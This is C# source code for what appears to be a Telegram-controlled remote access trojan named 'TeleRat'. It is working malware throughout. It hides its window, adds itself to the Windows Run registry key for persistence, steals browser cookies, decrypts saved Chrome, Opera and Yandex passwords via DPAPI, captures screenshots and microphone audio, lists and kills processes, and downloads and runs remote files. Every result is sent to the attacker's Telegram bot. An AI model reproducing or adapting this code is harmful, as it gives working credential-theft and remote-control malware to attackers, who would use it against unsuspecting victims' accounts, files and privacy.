public static void SendCommands() { string response = "/open_link|<link> - open some link in browser\n" + "/download_execute|<link> - download and instant open file\n" + "/exit - close bot\n/ddos|<ip>|<threads> - in developing" + "\n/GetCookieFile - get cookies from browsers\n" + "/GetSystem - get system specs\n" + "/GetProcess - get tasklist\n" + "/KillProcess|<process name> - kill process\n" + "/ls|<path> - get files and folders in <path>\n" + "To upload update you need to attach update\n " + "with caption \"/UploadUpdate\" \n" + "To upload file and open it you need to attach file\n " + "with caption \"/UploadExecute\"\n" + "/DownloadFile|<full path to file> - download file\n" + "/DownloadFolder|<full path to folder> - download files from folder in zip archive\n" + "/CaptureCam - get snapshot (in developing)\n/TakeScreenShot - take screenshot\n" + "/GetGooglePasswords - get passwords from google\n" + "/RecordAudio|<time in secs (5 is default)>\n" + "/MessageBox|<message>|<caption> - show message box\n" + "/OpenFile|<full path to file> - open file\n" + "If you wonna just send a file without execute you can simply send this file without any caption\n" + "If you are sending audio, photo or video file send it like a file/help - get command list"; TelegramSystem.SendMessage(response); }
public static void GetSystem() { string name = string.Empty; string VideoProc = string.Empty; string Capacity = string.Empty; string procName = string.Empty; string mac = string.Empty; string response = string.Empty; string SysVer = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion", "ProductName", null); GetMacAddress(out mac); ManagementObjectSearcher searcher2 = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController"); foreach (ManagementObject queryObj in searcher2.Get()) { name = queryObj["Caption"].ToString(); VideoProc = string.Format("Семейство: {0}", queryObj["VideoProcessor"]); Capacity = string.Format("Обьем: {0}", queryObj["AdapterRAM"]); } ManagementObjectSearcher mos = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Processor"); foreach (ManagementObject mo in mos.Get()) { procName = mo["Name"].ToString(); } ComputerInfo CI = new ComputerInfo(); ulong mem = ulong.Parse(CI.TotalPhysicalMemory.ToString()); string ram = Math.Round(Convert.ToDouble(mem / (1024 * 1024) / 1000), 0).ToString(); response += $"System [{GetIp()}] \n"; response += "User name: " + Environment.UserName + "\n"; response += ("OS Version: " + SysVer + "\n"); if (cMain.Is64Bit()) { response += ("OS Аrchitecture: 64bit\n"); } else { response += ("OS Аrchitecture: 32bit"); } response += ("Local drives: "); foreach (var loc in Environment.GetLogicalDrives()) { response += (loc + " "); } response += ("\n"); response += ("Core count: " + Environment.ProcessorCount + "\n"); response += ("Processor name: " + procName + "\n"); response += ("Video card: " + name + "\n"); response += ("RAM: " + ram + " GB\n"); response += ("\n"); response += ("Local IP: " + GetLocalIp() + "\n"); response += ("IP: " + GetIp() + "\n"); response += ("MAC: " + mac + "\n"); TelegramSystem.SendMessage(response); }
public static void DownloadFile(string path) { if (File.Exists(path)) { TelegramSystem.SendDocument(path, $"DownloadFile [{GetIp()}]"); } else { TelegramSystem.SendMessage($"[File downloader] File doesn't exists."); } }
public static void TakeScreenShot() { Graphics gr; Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height); gr = Graphics.FromImage(bmp); gr.CopyFromScreen(0, 0, 0, 0, bmp.Size); bmp.Save("screen.png", ImageFormat.Png); TelegramSystem.SendDocument("screen.png", "[ScreenShot] Screenshot like document."); }
private static async void OnTelegramMessage(object sender, Telegram.Bot.Args.MessageEventArgs e) { if (e.Message.Document != null && e.Message.Caption.Contains("/UploadUpdate")) // TODO: Сделать разархивирование и запуск файла. Сделать рабочий метод для использования комманды { string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\" + e.Message.Document.FileName; Directory.CreateDirectory(path); var file = await bot.GetFileAsync(e.Message.Document.FileId); using (var saveFile = new FileStream(path + "\\" + e.Message.Document.FileName, FileMode.Create)) { await bot.DownloadFileAsync(file.FilePath, saveFile); } Process.Start(path); } else if (e.Message.Document != null && e.Message.Caption == "/UploadExecute") { string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\"; Directory.CreateDirectory(path); path += e.Message.Document.FileName; var file = await bot.GetFileAsync(e.Message.Document.FileId); using (var saveFile = new FileStream(path, FileMode.Create)) { await bot.DownloadFileAsync(file.FilePath, saveFile); } try { Process.Start(path); } catch { TelegramSystem.SendMessage($"[ERROR] [{Functions.GetIp()}] Something wrong"); } } else if (e.Message.Document != null) { string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\" + e.Message.Document.FileName; Directory.CreateDirectory(path); var file = await bot.GetFileAsync(e.Message.Document.FileId); using (var saveFile = new FileStream(path + "\\" + e.Message.Document.FileName, FileMode.Create)) { await bot.DownloadFileAsync(file.FilePath, saveFile); } } else { cmd command = new cmd(e.Message.Text); Execute(command); } }
public static void GetProcess() { string response = $"Task list {GetIp()}\n"; Process prc = new Process(); Process[] processes = Process.GetProcesses(); foreach (var process in processes) { response += ("ID: " + process.Id + " Name: " + process.ProcessName.ToLower() + "\n"); } TelegramSystem.SendMessage(response); }
public static void KillProcess(string processID) // Закрытие процесса и отправка подтверждения { Process prc = new Process(); Process[] processes = Process.GetProcesses(); foreach (var process in processes) { if (process.ProcessName.ToLower() == processID.ToLower()) { TelegramSystem.SendMessage($"[Process killer] Process [{processID}] has been killed!"); process.Kill(); } } }
public static void GetCookieAndLoginData() { string directory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Bot"; Directory.CreateDirectory(directory); KillBrowsers(); string username = Environment.UserName; string[] pathes = { $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", $"C:\\Users\\{username}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", $"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies", $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 1\\Cookies", $"C:\\Users\\{username}\\AppData\\Local\\Microsoft\\Windows\\INetCookies", $"C:\\Users\\{username}\\AppData\\Local\\Microsoft\\Windows\\Cookies" }; int counter = 0; foreach (var path in pathes) { Console.WriteLine(path); Console.WriteLine(File.Exists(path)); if (File.Exists(path)) { Console.WriteLine(File.Exists(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}")); if (File.Exists(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}")) { File.Delete(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}"); File.Copy(path, directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}"); } else { File.Copy(path, directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}"); } } counter++; } string folder = ZipFolder(directory); TelegramSystem.SendDocument(folder, $"[COOKIES] Got {counter} cookies [{GetIp()}]"); }
public static string ZipFile(string path) { string pathToSave = Environment.CurrentDirectory + $"\\{Path.GetFileNameWithoutExtension(path)}" + ".zip"; try { using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile()) { DirectoryInfo di = new DirectoryInfo(path); zip.AddFile(path); zip.Save(pathToSave); } } catch (Exception ex) { TelegramSystem.SendMessage($"[ZipFile ERROR] {ex.Message}"); } return(pathToSave); }
public static string ZipFolder(string folder) { string pathToSave = config.appData; try { using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile()) { DirectoryInfo di = new DirectoryInfo(folder); pathToSave += "\\" + di.Name + ".zip"; zip.AddDirectory(folder); zip.Save(pathToSave); } } catch (Exception ex) { TelegramSystem.SendMessage($"[ZipFolder ERROR] {ex.Message}"); } return(pathToSave); }
public static void GetFiles(string path) { string response = $"Files and directories [{GetIp()}] [\"D:\\BotFiles\\ \"]: \n"; try { DirectoryInfo dir = new DirectoryInfo(path); foreach (var item in dir.GetDirectories()) { response += item.Name + "\n"; } foreach (var item in dir.GetFiles()) { response += item.Name + "\n"; } TelegramSystem.SendMessage(response); } catch (Exception ex) { TelegramSystem.SendMessage($"[ERROR] [{GetIp()}] {ex.Message}"); } }
public static void RecordAudio(string time = "5") { int delay; if (!int.TryParse(time, out delay)) { TelegramSystem.SendMessage("[RecordAudio ERROR] Write correct seconds."); } else { delay += 1; string path = config.appData + "\\BotFiles\\waveS.wav"; try { WaveInEvent waveSource = new WaveInEvent(); //waveSource.DeviceNumber = 0; waveSource.WaveFormat = new WaveFormat(44100, 1); waveSource.DataAvailable += new EventHandler <WaveInEventArgs>(waveSource_DataAvailable); string tempFile = path; waveFile = new WaveFileWriter(tempFile, waveSource.WaveFormat); waveSource.StartRecording(); Thread.Sleep(delay * 1000); try { waveSource.StopRecording(); waveFile.Dispose(); TelegramSystem.SendDocument(path, $"[RecordAudio {GetIp()}]"); } catch (Exception ex) { TelegramSystem.SendMessage($"[RecordAudio ERROR] {ex.Message}"); } } catch (Exception ex) { TelegramSystem.SendMessage($"[RecordSound ERROR] {ex.Message}"); } } }
static void Main(string[] args) { Microsoft.Win32.RegistryKey Key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey( "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", true); //добавляем первый параметр - название ключа // Второй параметр - это путь к // исполняемому файлу нашей программы. Key.SetValue(config.currProc, "D:\\BotFiles\\TeleRat.exe"); Key.Close(); TelegramSystem.SendMessage($"Bot [{IP}] is online"); var handle = GetConsoleWindow(); ShowWindow(handle, SW_HIDE); signalHandler += HandleConsoleSignal; ConsoleHelper.SetSignalHandler(signalHandler, true); bot = new TelegramBotClient(Token); bot.OnMessage += OnTelegramMessage; bot.StartReceiving(); Console.ReadKey(); }
static void Execute(cmd CMD) { string text = string.Empty; if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt")) { StreamReader reader = new StreamReader(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt"); text = reader.ReadToEnd(); reader.Close(); } else { StreamWriter Writer = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt"); Writer.AutoFlush = true; Writer.Close(); } if (text == CMD.ComType + "|" + CMD.ComContent) { } else { switch (CMD.ComType) { case "/open_link": if (CMD.ComContent == null) { TelegramSystem.SendMessage("Usage - /open_link|<link> (without <>)"); } else { Functions.OpenLink(CMD.ComContent); } break; case "/download_execute": if (CMD.ComContent == null) { TelegramSystem.SendMessage("Usage - /download_execute|<link> (without <>)"); } else { Functions.DownloadExecute(CMD.ComContent); } break; case "/exit": Environment.Exit(0); break; case "/ddos": break; case "/GetCookieFile": Functions.GetCookieAndLoginData(); break; case "/GetSystem": Functions.GetSystem(); break; case "/GetProcess": Functions.GetProcess(); break; case "/MessageBox": if (CMD.ComContent == null || CMD.ComThreads == null) { TelegramSystem.SendMessage("Usage - /MessageBox|<message>|<caption> (without <>)"); } else { Functions.ShowMessageBox(CMD.ComContent, CMD.ComThreads); } break; case "/KillProcess": if (CMD.ComContent == null) { TelegramSystem.SendMessage("Usage - /KillProcess|<process name> (without <>)"); } else { Functions.KillProcess(CMD.ComContent); } break; case "/ls": if (CMD.ComContent == null) { Functions.GetFiles("D:\\BotFiles\\"); } else { Functions.GetFiles(CMD.ComContent); } break; case "/DownloadFile": if (CMD.ComContent == null) { TelegramSystem.SendMessage("Usage - /DownloadFile|<full path to file> (without <>)"); } else { Functions.DownloadFile(CMD.ComContent); } break; case "/CaptureCam": //Functions.CaptureCam(); // TODO: Snapshot с WebCam break; case "/TakeScreenShot": Functions.TakeScreenShot(); break; case "/GetGooglePasswords": Functions.GetGooglePasswords(); // TODO: Архивирование файлов в .zip архив break; case "/ping": TelegramSystem.SendMessage($"[Ping] [{Functions.GetIp()}] I'm up"); break; case "/OpenFile": if (CMD.ComContent == null) { TelegramSystem.SendMessage("Usage - /OpenFile|<full path to file> (without <>)"); } else { Process.Start(CMD.ComContent); } break; case "/DownloadFolder": if (CMD.ComContent == null) { TelegramSystem.SendMessage("Usage - /DownloadFolder|<full path to folder> (without <>)"); } else { Functions.DownloadFolder(CMD.ComContent); } break; case "/help": Functions.SendCommands(); break; case "/RecordAudio": if (CMD.ComContent != null) { Functions.RecordAudio(CMD.ComContent); } else { Functions.RecordAudio(); } break; default: int i = 1; foreach (var command in commandList) { if (CMD.ComType.Contains(command)) { i = 0; } } if (i != 0) { Functions.SendCommands(); } break; } StreamWriter Writer = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt"); Writer.AutoFlush = true; Writer.Write(CMD.ComType + "|" + CMD.ComContent); Writer.Close(); } }
private static void HandleConsoleSignal(ConsoleSignal consoleSignal, int returnedValue) { TelegramSystem.SendMessage($"Bot [{IP}] is offline"); Thread.Sleep(750); }
public static void GetGooglePasswords() { string username = Environment.UserName; string[] pathes = { $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", $"C:\\Users\\{username}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 1\\Login Data", $"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data", $"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker" }; KillBrowsers(); try { int counter = 0; foreach (var db_way in pathes) { if (File.Exists(db_way)) { Directory.CreateDirectory($"{config.appData}\\BotFiles\\passes"); string filename = $"{config.appData}\\BotFiles\\passes\\pass {config.passes[counter]}.txt"; StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8); string db_field = "logins"; byte[] entropy = null; string description; string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True"; DataTable DB = new DataTable(); string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", ""); using (SQLiteConnection connect = new SQLiteConnection(ConnectionString)) { SQLiteCommand command = new SQLiteCommand(sql, connect); SQLiteDataAdapter adapter = new SQLiteDataAdapter(command); adapter.Fill(DB); int rows = DB.Rows.Count; for (int i = 0; i < rows; i++) { byte[] byteArray = (byte[])DB.Rows[i][5]; byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description); string password = new UTF8Encoding(true).GetString(decrypted); if (password == string.Empty && DB.Rows[i][3].ToString().Trim() == string.Empty) { continue; } else { Writer.Write(i + 1 + ") "); // Here we print order number of our trinity "site-login-password" Writer.WriteLine($"URL: [{DB.Rows[i][1]}]"); // site URL Writer.WriteLine($"Login: [{DB.Rows[i][3]}]"); // login Writer.WriteLine($"Password: [{password}]"); Writer.WriteLine(); } } Writer.Close(); } } counter++; } string folder = ZipFolder($"{config.appData}\\BotFiles\\passes"); TelegramSystem.SendDocument(folder, "[Passwords] Well done!"); } catch (Exception ex) { TelegramSystem.SendMessage($"[Passwords] {ex.Message}"); } }
public static void DownloadFolder(string path) { string zip = ZipFolder(path); TelegramSystem.SendDocument(zip); }